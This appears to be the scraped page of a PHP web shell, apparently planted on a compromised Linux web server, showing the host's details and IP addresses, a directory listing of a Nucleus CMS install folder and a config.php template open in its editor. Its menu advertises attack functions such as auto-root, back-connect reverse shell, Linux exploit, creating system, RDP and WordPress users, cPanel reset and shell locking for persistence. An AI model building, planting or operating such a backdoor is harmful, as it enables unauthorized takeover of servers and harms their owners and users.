Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 108.162.216.74
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
nucleus /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
Notes.txt
188
B
-rw-r--r--
clone.php
3.15
KB
-rw-r--r--
config.php
1009
B
-rw-r--r--
edit.php
4.39
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
250
B
-rw-r--r--
import.php
3.27
KB
-rw-r--r--
info.xml
2.05
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.49
KB
-rw-r--r--
install.xml
1.39
KB
-rw-r--r--
md5
2.2
KB
-rw-r--r--
upgrade.php
2.42
KB
-rw-r--r--
upgrade.xml
375
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php // mySQL connection information $MYSQL_HOST = '[[softdbhost]]'; $MYSQL_USER = '[[softdbuser]]'; $MYSQL_PASSWORD = '[[softdbpass]]'; $MYSQL_DATABASE = '[[softdb]]'; $MYSQL_PREFIX = '[[dbprefix]]'; // new in 3.50. first element is db handler, the second is the db driver used by the handler // default is $MYSQL_HANDLER = array('mysql','mysql'); //$MYSQL_HANDLER = array('mysql','mysql'); //$MYSQL_HANDLER = array('pdo','mysql'); $MYSQL_HANDLER = array('mysql',''); // main nucleus directory $DIR_NUCLEUS = '[[softpath]]/nucleus/'; // path to media dir $DIR_MEDIA = '[[softpath]]/media/'; // extra skin files for imported skins $DIR_SKINS = '[[softpath]]/skins/'; // these dirs are normally sub dirs of the nucleus dir, but // you can redefine them if you wish $DIR_PLUGINS = $DIR_NUCLEUS . 'plugins/'; $DIR_LANG = $DIR_NUCLEUS . 'language/'; $DIR_LIBS = $DIR_NUCLEUS . 'libs/'; // include libs include($DIR_LIBS.'globalfunctions.php'); $CONF['alertOnSecurityRisk'] = 0; ?>
Close